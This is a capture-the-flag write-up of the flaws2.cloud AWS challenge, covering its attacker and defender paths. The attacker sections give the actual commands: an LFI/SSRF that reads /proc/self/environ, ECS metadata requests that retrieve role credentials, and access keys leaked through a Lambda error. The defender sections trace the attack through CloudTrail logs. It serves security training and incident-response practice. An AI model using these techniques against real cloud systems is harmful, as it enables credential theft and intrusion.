How I Solve flaws2.cloud

My write-up for all levels of flaws2.cloud, both Attacker Path & Defender Path

After completing flaws.cloud a few days earlier, I got tasked to complete the sequel. Let's just jump into it.

Again, this write-up is not the "definitive" way of solving flaws2.cloud, but rather about how I approach the challenges, what I tried, what failed, and what succeeded.

Attacker Path

Level 1: Web Exploitation, Sorta-Kinda?

The first level gives us a PIN code input. To advance to the next level, the correct PIN input is required. It is also noted that the correct PIN is 100 digits long, so we can’t brute force it. Initially, I thought that this was too "guessy", since I assumed for a challenge centered on AWS there couldn’t be exploits in the client-side. Turns out, on inspect element, I found something interesting:

There are two things worth noting here:

The PIN code form will be submitted to a REST API in AWS API gateway, with a REST API ID of 2rfismmoo8, a region of us-east-1, a stage default, and the resource path level1. Since there’s no ‘method’ attribute in the form, the request to the API will be a GET request.
There is a validation for the inputs so that it only accept numbers. For invalid inputs, the form will not be submitted, and instead a client-side alert will show up.

This basically means that, every submission with an invalid value will never go to the API. So I got curious: What would happen if we submit an invalid value submission straight to the API? I tried curl-ing.

// curl https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1\?code=a

// Error, malformed input
{
  "LANG": "en_US.UTF-8",
  "TZ": ":UTC",
  "AWS_LAMBDA_INITIALIZATION_TYPE": "on-demand",
  "LAMBDA_RUNTIME_DIR": "/var/runtime",
  "AWS_DEFAULT_REGION": "us-east-1",
  "AWS_LAMBDA_FUNCTION_MEMORY_SIZE": "128",
  "AWS_SESSION_TOKEN": "IQoJb3JpZ2luX2VjEEAaCXVzLWVhc3QtMSJIMEYCIQDf4pCOgu9XJ2xlVxt8j5aMZ7Iq9acdFF3P01VQTNeq7AIhAMLekPHuT4E3ZoIW+0YHam4zbFfAYwRLYA3ZL3WgIX/EKuACCAgQAxoMNjUzNzExMzMxNzg4Igw3Ay2Nce+h5A+TIwYqvQKEmOCZfdLuv99IdBPoTESNpN89IpLdhqb8uT/ZzP3jJkokYobyoFlALpQSXPB08uzZCEMATE0EX775yS2n7bm5tVDn2DUNhg73Br1GdGzbkoB0GsQRbpNjhnKqkSrgVsm/R3CI+Sm+EvURorzVwG8z94Krh2l2g3Sm8gIE9MwtT0UqpLZF8Q35jYBD9isjjD9nDoppB1wZFTwzSVGOQNsU+tD/arq24VkRdrQ+Vc2bqbj7cyEXicRzhXvxLbiNjTNJ8Xs9ekz/DBlro+0HgI0zMIzNRYUfAJmppqqxbf7BdT9NNpmKRdhjwN1RPbWUO5/cC3jirBK7A59/p6JJqFiw+Lbpb9/2iW8D7QOYC421NMmiQte/e/p3e3+SK+J1nBxa7ibloMuPkuvZnvi4yA/Lf/FGQdANBuICtbRGbzCqwfrMBjqdAfEt45E8qqbFI5EvalzgpldyLKTmGynmjoFgeN4xSEe4LPktnHxej12v3lpUUUmugkiLm2JKBx5wp7x6ZO0z5JjPKsKURfw/5UntEd8oMPi0HAne8A2pyqUBPDMI9Pb6eq0aG6x6lq60yRuH2Ar2SrAiLJWEglvpeqtIk371IvWt16nPPIyUr9Bstx9O++iLBnOxKkQUnG8Fz6zSp0U=",
  "_HANDLER": "index.handler",
  "AWS_ACCESS_KEY_ID": "ASIAZQNB3KHGGFMPEL4J",
  "_AWS_XRAY_DAEMON_ADDRESS": "169.254.79.129",
  "AWS_REGION": "us-east-1",
  "_AWS_XRAY_DAEMON_PORT": "2000",
  "AWS_EXECUTION_ENV": "AWS_Lambda_nodejs8.10",
  "LD_LIBRARY_PATH": "/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib",
  "AWS_LAMBDA_RUNTIME_API": "127.0.0.1:9001",
  "AWS_LAMBDA_FUNCTION_VERSION": "$LATEST",
  "PATH": "/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin",
  "AWS_LAMBDA_LOG_GROUP_NAME": "/aws/lambda/level1",
  "AWS_XRAY_CONTEXT_MISSING": "LOG_ERROR",
  "AWS_XRAY_DAEMON_ADDRESS": "169.254.79.129:2000",
  "AWS_SECRET_ACCESS_KEY": "/NMTJRm40arid84+s6k5IS5zESBEUsPFe8nGLWq5",
  "AWS_LAMBDA_LOG_STREAM_NAME": "2026/02/25/[$LATEST]1cca58ef65f946b8833a152bb3509c52",
  "LAMBDA_TASK_ROOT": "/var/task",
  "AWS_LAMBDA_FUNCTION_NAME": "level1",
  "NODE_PATH": "/opt/nodejs/node8/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task:/var/runtime/node_modules",
  "_X_AMZN_TRACE_ID": "Root=1-699ea0aa-5c91043d548df72f0d6ba2bf;Parent=4ec358e10c8fd503;Sampled=0;Lineage=1:e547cb94:0"
}

There is so much information here, including a valuable access key, secret key, and session token. After configuring them using aws --profile flaws2-1 configure, I tried getting the identity information.

// aws --profile flaws2-1 sts get-caller-identity

{
    "UserId": "AROAIBATWWYQXZTTALNCE:level1",
    "Account": "653711331788",
    "Arn": "arn:aws:sts::653711331788:assumed-role/level1/level1"
}

From here, we know that the identity we just got is not a user, but an assumed role (level1) with a session name called level1 as well. After this discovery, I tried many commands to no avail:

aws --profile flaws2-1 lambda list-functions
aws --profile flaws2-1 lambda get-function --function-name level1
aws --profile flaws2-1 iam list-attached-role-policies --role-name level1
aws --profile flaws2-1 s3 ls
aws --profile flaws2-1 ec2 describe-instances
aws --profile flaws2-1 iam list-roles
aws --profile flaws2-1 iam list-policies

and many more.

After quite some time, I realized I fatally missed one important command: listing the level’s bucket. The s3 command I tried was only listing the buckets that the user have, but I forgot to try listing the level 1 bucket itself…..

aws --profile flaws2-1 s3 ls s3://level1.flaws2.cloud
                           PRE img/
2018-11-21 03:55:05      17102 favicon.ico
2018-11-21 09:00:22       1905 hint1.htm
2018-11-21 09:00:22       2226 hint2.htm
2018-11-21 09:00:22       2536 hint3.htm
2018-11-21 09:00:23       2460 hint4.htm
2018-11-21 09:00:17       3000 index.htm
2018-11-21 09:00:17       1899 secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html

We have the second level.

Level 2: Thank God, I Understand Containerization

This next level is running as a container at http://container.target.flaws2.cloud/. Just like S3 buckets, other resources on AWS can have open permissions. I'll give you a hint that the ECR (Elastic Container Registry) is named "level2".

Alright, we’re already given a starting point. Let’s look into the ECR right away.

Knowing that the next level is running as a container, containers must’ve run from images. So the first thing I tried is enumerating available images in the ECR and gather as much information about the image as possible. The list-images command requires the --repository-name parameter, and even though we’re not informed of what the repository name is, we’re informed of the registry name in the level description and can make the educated guess that the repository name is also level2.

// aws --profile flaws2-1 ecr list-images --repository-name level2

{
    "imageIds": [
        {
            "imageDigest": "sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e",
            "imageTag": "latest"
        }
    ]
}

// aws --profile flaws2-1 ecr describe-images --repository-name level2 

{
    "imageDetails": [
        {
            "registryId": "653711331788",
            "repositoryName": "level2",
            "imageDigest": "sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e",
            "imageTags": [
                "latest"
            ],
            "imageSizeInBytes": 75937660,
            "imagePushedAt": "2018-11-27T10:34:16+07:00",
            "imageManifestMediaType": "application/vnd.docker.distribution.manifest.v2+json",
            "lastRecordedPullTime": "2026-02-25T01:39:44.189000+07:00",
            "imageStatus": "ACTIVE"
        }
    ]
}

I tried other commands like describe-repositories and describe-registry, but the access is denied. I also tried the batch-get-image command to ensure we have full access to the image, even to its layers’ details. With this, I’ve come up with the idea to pull the image locally using Docker.

In order to do that, I must be authenticated locally on my Docker. In authenticating to ECR, we use the following format as the registry:

[AWS account ID].dkr.ecr.[region].amazonaws.com

In this case, the AWS account ID provided is 653711331788, and the region is using us-east-1. So our registry URL is 653711331788.dkr.ecr.us-east-1.amazonaws.com. For the username, we can use “AWS”. And for the password, we can get it from the get-login-password command. By using the following command:

aws --profile flaws2-1 ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin 653711331788.dkr.ecr.us-east-1.amazonaws.com

I got successfully authenticated, which means I can now pull images from the given ECR. We know that the repository name is level2 and the available tag is :latest, so with the following command, we can get a local copy of the level2 image in Docker:

docker pull 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest

After successfully pulling, I ran the image using docker run -d --name flaws2-2 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest, then opening the container in terminal using docker exec -it flaws2-2 sh. I tried looking into the home directory, but there was nothing.

Then I remembered that this is a webserver. So I went to /var/www/html to see the served files.

In there, there’s the index.htm file, which contains the following:

...
<div class="content">
    <div class="row">
        <div class="col-sm-12">
            <center><h1>Level 3</h1></center>
            <hr>
            Read about Level 3 at <a href="http://level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud">level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud</a>
            <p>
        </div>
    </div>
</div>

With this, we have the URL for level 3: level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud.

After looking at the Level 2 hints, turns out this was unintended. The intended solution is to inspect the docker image, then figure out the contents of the Dockerfile to get the secret password and authenticate to the container. The inspection can be done layer-by-layer, or in my case because I use Docker Desktop, through clicking the image in the Images section.

Level 3: Web Exploitation, Again

The container's webserver you got access to includes a simple proxy that can be access with: http://container.target.flaws2.cloud/proxy/http://flaws.cloud or http://container.target.flaws2.cloud/proxy/http://neverssl.com

This is quite similar with the fifth level in the first flaws.cloud. Just to test things out, I tried to proxy to the “magic IP” that is 169.254.169.254 like in the previous flaws.cloud, but it doesn’t work. And it makes sense, since this webserver is inside a container rather than an EC2. I’ve then Googled things like metadata services for containers, also to no avail (maybe wrong keyword?). As a starting point, I went to open the first hint.

Hint 1 said that containers running via ECS on AWS have their creds at 169.254.170.2/v2/credentials/[GUID] where the GUID is found from an environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI. We have our "magic IP" here.

With this, I looked up the IP address in Google and found this documentation: Amazon ECS task metadata endpoint version 2. Similar to the challenge in the first flaws.cloud, containers too, have a task metadata endpoint that can be accessed internally. Since we have a proxy, that internal endpoint becomes accessible as well. I tried accessing the endpoints there, hoping I might probably find one or more exposed environment variables, but it turns out that those are only purely metadata of the task (simply explained, like the running status of the container, etc.)

I’m not gonna lie, I was stuck for a good long while here, because I avoided opening the hints. I simply assumed that the environment variables can be exposed through an internal endpoint, just like in the first flaws.cloud. So I searched very hard for documentations and possibly other endpoints, but then I decided to open the next hint because I’ve taken too much time searching with no progress.

Hint 2 tells me something I have known for a long while instead: “environment variables exist in /proc/self/environ”.

This is literally my thought process:

Hah? Ini sih gw juga udah tau. Cuma gimana caranya bisa ngebuka itu??? Emangnya ada LFI? Lah? Bentar. Kalo hintnya ngarahin ke buka /proc/self/environ, berarti ada LFI ga sih? Lah???

Translated (sorta-kinda):

What? I’ve known this. But how do I even get access to the file??? Is there even an LFI? Huh? Wait. If the hint guides me to /proc/self/environ, doesn’t that mean there’s an LFI? Huh???

I focused too much on the AWS aspect and didn’t bother to check the webserver for vulnerabilities. Based on the second hint, it’s leading us to a potential LFI, so I went ahead and checked the deployment files. I do this by running the image from level 2 and accessing the container via terminal. The proxy is running in Python with the following script:

import SocketServer
import SimpleHTTPServer
import urllib
import os

PORT = 8000

class Proxy(SimpleHTTPServer.SimpleHTTPRequestHandler):
  def do_GET(self):
    self.send_response(200)
    self.send_header("Content-type", "text/html")
    self.end_headers()

    # Remove starting slash
    self.path = self.path[1:]

    # Read the remote site
    response = urllib.urlopen(self.path)
    the_page = response.read(8192)

    # Return it
    self.wfile.write(bytes(the_page))
    self.wfile.close()

httpd = SocketServer.ForkingTCPServer(('', PORT), Proxy)
print "serving at port", PORT
httpd.serve_forever()

And yeah, there are intentional vulnerabilities here.

First of all, this is probably using a very old Python version, denoted by the use of the legacy urllib.urlopen() function. Based on the legacy urllib documentation, urllib.urlopen() will open a local file if there is no scheme identifier like “http://” in the path. This is already grounds for LFI, because if we can pass an absolute path for a file to the function call, the function will definitely open the file and return it as a response.

Second, the proxy server only removes one starting slash on self.path = self.path[1:]. If we give it two slashes, then one slash will remain, opening our way to absolute path LFI.

I continued by checking the nginx files, and found this interesting config in /etc/nginx/sites-available/default:

# cat /etc/nginx/sites-available/default
limit_req_zone $binary_remote_addr zone=one:10m rate=1r/s;

server {
        listen 80 default_server;
        listen [::]:80 default_server;

        root /var/www/html;
        index index.html index.htm;
        merge_slashes off;

        server_name _;

        location / {
                try_files $uri $uri/ =404;
                auth_basic "Restricted Content";
                auth_basic_user_file /etc/nginx/.htpasswd;
        }

        location /debug {
            #perl_set $debug 'sub { return %ENV; }';
            #return 200 '${debug}';
            return 200 'debug';
        }

        location  ~* ^/proxy/(.*)$ {
          limit_except GET {
            deny   all;
          }
          limit_req zone=one burst=1;

          set $proxyuri '$1';
          proxy_limit_rate 4096;
          proxy_set_header X-Real-IP $remote_addr;
          proxy_set_header Host      'localhost';

          resolver 8.8.8.8;
          proxy_pass http://127.0.0.1:8000/$proxyuri;
        }
}

There are also vulnerabilities here that supports the potential LFI I found in the proxy server. The nginx config turns off merge_slashes. If that configuration is on, when we try to pass multiple slashes (for example, ///), it will be merged into one slash (/), which might stop us from doing LFI. Because it is off, the LFI is still possible.

Other than that, the proxy endpoint captures all string after the proxy/ path without restrictions and passes it to the proxy server. With this, we can definitely get the environment variables through leveraging LFI by accessing:

http://container.target.flaws2.cloud/proxy//proc/self/environ

Success! And it returns the following:

HOSTNAME=ip-172-31-50-183.ec2.internalHOME=/rootAWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/b428381e-5bd5-41f4-a6e2-9119a24727e5AWS_EXECUTION_ENV=AWS_ECS_FARGATEECS_AGENT_URI=http://169.254.170.2/api/edb86014f88946178a203ce66a7cd4bb-3779599274AWS_DEFAULT_REGION=us-east-1ECS_CONTAINER_METADATA_URI_V4=http://169.254.170.2/v4/edb86014f88946178a203ce66a7cd4bb-3779599274ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/edb86014f88946178a203ce66a7cd4bb-3779599274PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binAWS_REGION=us-east-1PWD=/

And we have what we needed:

AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/b428381e-5bd5-41f4-a6e2-9119a24727e5

We can continue by accessing the link in Hint 1 through the proxy:

http://container.target.flaws2.cloud/proxy/http://169.254.170.2/v2/credentials/b428381e-5bd5-41f4-a6e2-9119a24727e5

The container returns a credential we can definitely use.

{
    "RoleArn": "arn:aws:iam::653711331788:role/level3",
    "AccessKeyId":"ASIAZQNB3KHGI45FDEFH",
    "SecretAccessKey":"sX/k8o8Z8g3BSZQZ46PzNIfK4LES51/oYGtdjt9A",
"Token":"IQoJb3JpZ2luX2VjEHEaCXVzLWVhc3QtMSJIMEYCIQCfIvaJWX7IJh7dxRR5a4wvmS1xj06gEDEVGGdjfCzYRwIhAJ2ONzKvvDS9tKfvqASGwVCKjQdvZdzCwE06lj7TcjG1KuMDCDoQAxoMNjUzNzExMzMxNzg4IgyZDvJY1z6sGgBq+/0qwAPhNF/U12kKCn5c4PmSZW/oPhpvDzLU8kxjKvrKpYYF1KpjWT7iWHYHmqKbFNzpxu/NQacDgt/wHtoa4VrgKVlF9ec4MVqFT+wQr/McaIJId2LXmo9h/yEoKgnDx+2FLAteuoAFPptmLFcxAD6uuPgVJsmF7BBElygAZLHQvebMaVVZE+Lll7TAjDEwq4ugnv/EibW9NFKVrMxgfygDvfhyZmCQjbT19xzORkyUHARCQuVI4NlT2wrh1n4AvQU1c9/XY6SvEPzRMrvscrfa62CQG5HruDygXGnvk42QlfhFVuHXjUaGEbVNG4SfS21iok4+obTZK02bDcbRbeKcVzxnjQW/cq1dT//cG/ldXhjvICPW0OoBlrKamaK5I9anrHUvP+wVF8Z9GPofxq8dDicNZYophYT6aD0ppwe0ohxT7yY9WVv4J3elKfbbxHSTXzJNi8K2/wlYDpeQmZC1/qdvl+8XV4prZG/Z5jZIiErae6E/BPoq2CEwIkQQy/Ve1OzkjTpZWr4ES/yF0pQ7M0+uWTvukp8LDEpQxdCyEF8oFq/37AfeJl6v/7omIvGo0IZ2xUGypOBOPrqR4e33aLe4MPushc0GOqQBgktM7NI5CulAT8XCVMRsynQZK6NRKfAkdwIwT0yHG28oOlnyjTWJOgshmlgc4gTw2rxmU0S1FwxbIZxgFJByBjlVifKOPGX2dWuInCnbAlmVUKHS0lrypzGX8/FtrQ/BW9MIGR/0B6DLWb7WBrmvv0WMfUY3Lnh4VcLBsMVjL3MAqGDt4aGxqVJY6OklPik5tO+E2958wPUaDAkLNd9bz961sxU=",
    "Expiration":"2026-02-27T14:31:55Z"
}

I configured the credentials by running aws --profile flaws2-3 configure, then listed the user’s buckets by aws --profile flaws2-3 s3 ls.

> aws --profile flaws2-3 s3 ls
2018-11-21 02:50:08 flaws2.cloud
2018-11-21 01:45:26 level1.flaws2.cloud
2018-11-21 08:41:16 level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
2018-11-27 02:47:22 level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
2018-11-28 03:37:27 the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud

We have the (turns out) final bucket:

the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud

The End

The end of flaws2.cloud's Attacker Path.

Honestly, I was a bit disappointed that it was only three levels. Even so, I still learned so much.

Defender Path

For the defender path, we’re given IAM credentials with a “Security” role attached:

Login: https://flaws2-security.signin.aws.amazon.com/console
Account ID: 322079859186
Username: security
Password: password
Access Key: AKIAIUFNQ2WCOPTEITJQ
Secret Key: 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

Objective 1: Download CloudTrail Logs

I started by configuring the credentials using aws --profile flaws-defender configure, then continued with aws --profile flaws-defender sts get-caller-identity.

// aws --profile flaws-defender sts get-caller-identity
{
    "UserId": "AIDAJXZBU42TNFRNGBBFI",
    "Account": "322079859186",
    "Arn": "arn:aws:iam::322079859186:user/security"
}

The authentication is successful. We’re also told that we’re given an S3 bucket named flaws2_logs, that contains CloudTrail logs recorded during an attack from the path earlier. I downloaded the logs using aws --profile flaws-defender s3 sync s3://flaws2-logs . and got a lot of .json.gz files under the AWSLogs directory.

Objective 2: Access The Target Account

It is mentioned that the best practice is to have a separate Security account that manages the CloudTrail logs from other AWS accounts, that also have some access to the other accounts. In this objective, we’re accessing a Target account using the IAM role granting the Security account access.

In my AWS config, I already have this profile:

[profile flaws-defender]
region = us-east-1

To add the target profile, I added a manual entry:

[profile target]
region = us-east-1
source_profile = flaws-defender
role_arn = arn:aws:iam::653711331788:role/security

Then I ran aws --profile target sts get-caller-identity and got the following:

{
    "UserId": "AROAIKRY5GULQLYOGRMNS:botocore-session-1772425781",
    "Account": "653711331788",
    "Arn": "arn:aws:sts::653711331788:assumed-role/security/botocore-session-1772425781"
}

Now I’m running an assumed role temporary session. What just happened? The way I see it:

I got authenticated as the profile flaws-defender earlier.
Creating a new entry with the target profile, I used flaws-defender as the source profile, as a “base credentials”
For the target profile, I used the arn:aws:iam::653711331788:role/security role. Take note that this role is from a different account with the ID 653711331788, not the security account with the ID 322079859186.
Essentially, this tells AWS CLI that “the Security user from account ID 322079859186 (denoted by the source_profile entry) wants to assume the Security role from account ID 653711331788 (by filling the role_arn entry with that role’s ARN)”
Since the Security user is trusted by the role, and since the Security user has the permission to assume the role, STS gives us a temporary credential, that is an assumed role temporary session.
So now, even though we were using the Security user credentials, we /become/ someone with a Security role in the account ID 653711331788.

With this in mind, knowing that the 653711331788 account ID is the one used in the Attacker path, running aws --profile target s3 ls now should show us the buckets in the Attacker path (since we’re now someone within the 653711331788 account ID).

> aws --profile target s3 ls
2018-11-21 02:50:08 flaws2.cloud
2018-11-21 01:45:26 level1.flaws2.cloud
2018-11-21 08:41:16 level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
2018-11-27 02:47:22 level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
2018-11-28 03:37:27 the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud

Objective 3: Use jq

I didn’t have jq, so I installed first. Then I ran find . -type f -exec gunzip {} \ to unarchive all the log files, and cat-ing them through jq using find . -type f -exec cat {} \; | jq '.'.

The results of those commands are nicely formatted, but there are too many information and the output is too long. I changed the jq query to only display the event names by replacing the piped jq command to jq '.Records[]|.eventName'.

find . -type f -exec cat {} \; | jq '.Records[]|.eventName’

"BatchGetImage"
"GetDownloadUrlForLayer"
"GetObject"
"GetObject"
"ListBuckets"
"GetObject"
"GetObject"
"GetObject"
"Invoke"
"CreateLogStream"
"AssumeRole"
"AssumeRole"
"CreateLogStream"
"AssumeRole"
"CreateLogStream"
"CreateLogStream"
"ListImages"
"CreateLogStream"
"GetObject"
"GetObject"
"GetObject"
"GetObject"
"GetObject"
"GetObject"
"GetObject"
"GetObject"
"GetObject"
"Invoke"
"GetObject"
"GetObject"
"GetObject"
"ListObjects"
"GetObject"
"GetObject"
"GetObject"
"GetObject"
"GetObject"

Turns out, these aren’t ordered, so the jq query can be refined to include the time as well by using jq -cr '.Records[]|[.eventTime, .eventName]|@tsv' | sort in the piped part. This will output the event time and names, and since the time is in the first column, it becomes the value compared to sort. With this, we can continue adding more column to gather more info. In the Defender Path guide, the final query becomes:

find . -type f -exec cat {} \; | jq -cr '.Records[]|[.eventTime, .sourceIPAddress, .userIdentity.arn, .userIdentity.accountId, .userIdentity.type, .eventName]|@tsv' | sort

The output is a little bit packed, but through the command, we know that the logs basically record any activity in the AWS infrastructure, not just the attacks. That includes other resources assuming roles, S3 requests from browsers that are listed as from “ANONYMOUS_PRINCIPAL”, and so on.

Objective 4: Identify Credential Theft

Looking at the logs, it’s apparent that the attack happened in the ListBucket event. To identify what happened, we can work from there backwards, starting from querying jq using the eventName property.

// find . -type f -exec cat {} \; | jq '.Records[]|select(.eventName=="ListBuckets")'

{
  "eventVersion": "1.05",
  "userIdentity": {
    "type": "AssumedRole",
    "principalId": "AROAJQMBDNUMIKLZKMF64:d190d14a-2404-45d6-9113-4eda22d7f2c7",
    "arn": "arn:aws:sts::653711331788:assumed-role/level3/d190d14a-2404-45d6-9113-4eda22d7f2c7",
    "accountId": "653711331788",
    "accessKeyId": "ASIAZQNB3KHGNXWXBSJS",
    "sessionContext": {
      "attributes": {
        "mfaAuthenticated": "false",
        "creationDate": "2018-11-28T22:31:59Z"
      },
      "sessionIssuer": {
        "type": "Role",
        "principalId": "AROAJQMBDNUMIKLZKMF64",
        "arn": "arn:aws:iam::653711331788:role/level3",
        "accountId": "653711331788",
        "userName": "level3"
      }
    }
  },
  "eventTime": "2018-11-28T23:09:28Z",
  "eventSource": "s3.amazonaws.com",
  "eventName": "ListBuckets",
  "awsRegion": "us-east-1",
  "sourceIPAddress": "104.102.221.250",
  "userAgent": "[aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9]",
  "requestParameters": null,
  "responseElements": null,
  "requestID": "4698593B9338B27F",
  "eventID": "65e111a0-83ae-4ba8-9673-16291a804873",
  "eventType": "AwsApiCall",
  "recipientAccountId": "653711331788"
}

From the results, we can identify that the source of the request doesn’t come from Amazon-owned IP address. And since the identity being used is an assumed role from the role/level3, we need to look at what the role actually is for.

// aws --profile target iam get-role --role-name level3
{
    "Role": {
        "Path": "/",
        "RoleName": "level3",
        "RoleId": "AROAJQMBDNUMIKLZKMF64",
        "Arn": "arn:aws:iam::653711331788:role/level3",
        "CreateDate": "2018-11-23T17:55:27+00:00",
        "AssumeRolePolicyDocument": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "",
                    "Effect": "Allow",
                    "Principal": {
                        "Service": "ecs-tasks.amazonaws.com"
                    },
                    "Action": "sts:AssumeRole"
                }
            ]
        },
        "Description": "Allows ECS tasks to call AWS services on your behalf.",
        "MaxSessionDuration": 3600,
        "RoleLastUsed": {
            "LastUsedDate": "2026-02-27T08:50:14+00:00",
            "Region": "us-east-1"
        }
    }
}

As we can see, this role is created for the ECS service, and the AssumeRole action inside the AssumeRolePolicyDocument is only allowed for the ECS tasks service. Still, the request comes from a non-AWS IP address, and this implies that the ECS has been hacked, though we don’t have the logs from inside the container.

Objective 5: Identify the public resource

Based on the challenges I’ve worked on, on credential theft cases, there must be at least one public service or action that becomes the vulnerability entry. In the logs, we can see that the source IP address performs other actions as well when assuming the level1 role. To identify where the public service or action came from, we need to trace it through the logs.

Before the ListBuckets action using the assumed level3 role, there are a series of actions that looks like its performed on ECR (ListImages, BatchGetImage, GetDownloadUrlForLayer). We’ll look into that starting from ListImages, because it’s safe to assume that these actions are the credential theft entrypoint, since they were the last few actions before the user assumed the level3 role.

// find . -type f -exec cat {} \; | jq '.Records[]|select(.eventName=="ListImages")'
...
  "requestParameters": {
    "repositoryName": "level2",
    "registryId": "653711331788"
  },
  "responseElements": null,
  "requestID": "2780d808-f362-11e8-b13e-dbd4ed9d7936",
  "eventID": "eb0fa4a0-580f-4270-bd37-7e45dfb217aa",
  "resources": [
    {
      "ARN": "arn:aws:ecr:us-east-1:653711331788:repository/level2",
      "accountId": "653711331788"
    }
  ],
...

Through the output, we know that the attacker is listing the images in the level2 repository, even though he’s assuming the level1 role. This means that there might be loose permissions in that repository. We can look into the repository’s policies.

// aws --profile target ecr get-repository-policy --repository-name level2 | jq '.policyText|fromjson'
{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "AccessControl",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "ecr:GetDownloadUrlForLayer",
        "ecr:BatchGetImage",
        "ecr:BatchCheckLayerAvailability",
        "ecr:ListImages",
        "ecr:DescribeImages"
      ]
    }
  ]
}

The policy’s Principal is set to *, meaning these actions are public for the world to execute. This means that the ECR is public. It is said on the Defender Path tutorial that we can use tools like CloudMapper to scan an account for public resources (like the ECR, for example) before tracing back an attack.

Objective 6: Use Athena

In this objective, the users are instructed to use Athena, an AWS service that can be used to analyze data directly in Amazon S3 using SQL.

I personally chose not to do this objective to avoid any charges (even though that it is said that the charges, if any, will likely be small), and because it’s more or less the same like the previous objectives, just this time using SQL. Even so, it is mentioned that Athena can be more useful for incident response because we don’t need to wait for the data to load and can just query right away, as long as we have defined the appropriate table.

Closing Remarks

Personally, even though with less levels, I like flaws2.cloud more, because the levels feels like actual cloud infrastructure penetration testing (even to exploiting vulnerabilities in web containers). The flow of the attacks are fun to follow, and I learned much more new concepts. Not to mention that there's a Defender Path to educate users the basics of incident response in cloud infrastructure attacks. I hope there's a flaws3.cloud.

Last updated 11 hours ago

hashtagAttacker Path

hashtagLevel 1: Web Exploitation, Sorta-Kinda?

hashtagLevel 2: Thank God, I Understand Containerization

hashtagLevel 3: Web Exploitation, Again

hashtagThe End

hashtagDefender Path

hashtagObjective 1: Download CloudTrail Logs

hashtagObjective 2: Access The Target Account

hashtagObjective 3: Use jq

hashtagObjective 4: Identify Credential Theft

hashtagObjective 5: Identify the public resource

hashtagObjective 6: Use Athena

hashtagClosing Remarks